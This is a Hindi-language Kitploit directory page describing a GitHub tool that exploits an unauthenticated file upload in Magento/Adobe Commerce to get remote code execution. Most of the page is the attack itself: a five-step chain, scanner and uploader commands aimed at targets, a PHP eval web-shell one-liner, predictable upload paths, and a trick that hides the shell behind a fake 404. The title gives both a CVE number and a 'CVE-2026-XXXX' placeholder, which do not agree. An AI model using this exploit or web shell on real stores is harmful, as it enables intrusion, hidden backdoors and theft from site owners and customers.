Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-43990-Magento-RCE — Magento APSB25-94 अनप्रमाणित फ़ाइल अपलोड से RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner | Kitploit
उपकरण/GitHubGitHub/amkkk221/cve-2025-43990-magento-rce
वेब भेद्यता स्कैनरपेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubamkkk221/cve-2025-43990-magento-rce

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-43990-Magento-RCE

Magento APSB25-94 अनप्रमाणित फ़ाइल अपलोड से RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

Magento APSB25-94 — अप्रमाणित फ़ाइल अपलोड से RCE

अवलोकन

Magento / Adobe Commerce में REST API गेस्ट कार्ट custom_options फ़ाइल अपलोड के माध्यम से अप्रमाणित फ़ाइल अपलोड का शोषण करता है।

हमला श्रृंखला

root@kitploit:~
1. GraphQL → leak product SKU
2. REST API → create guest cart
3. REST API → upload PNG polyshell via custom_options file_info
4. HTTP GET → access .php at predictable path
5. PHP exec → RCE

उपकरण

magento_godzilla.py — बैच स्कैनर

दो-चरणीय अपलोड: प्रोब फ़ाइल (WAF-सुरक्षित) + eval शेल (404 छद्मावरण)।

root@kitploit:~
pip install requests
python magento_godzilla.py -f urls.txt -t 20 -o results.txt

आउटपुट: RCE_CONFIRMED, SHELL_KILLED, PROBE_ONLY

magento_upload.py — एकल लक्ष्य अपलोड

root@kitploit:~
python magento_upload.py -u https://target.com -f godzilla.php
python magento_upload.py -u https://target.com -c '<?php eval($_POST[1]);?>'
python magento_upload.py -u https://target.com -f shell.php --raw

अपलोड पथ

root@kitploit:~
/pub/media/custom_options/quote/{c1}/{c2}/{filename}
/media/custom_options/quote/{c1}/{c2}/{filename}

शेल छद्मावरण

GET नकली 404 लौटाता है (HTTP 200 + "Not Found" बॉडी)। POST पासवर्ड पैरामीटर के साथ कोड निष्पादित करता है।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए।

टूल डाउनलोड करें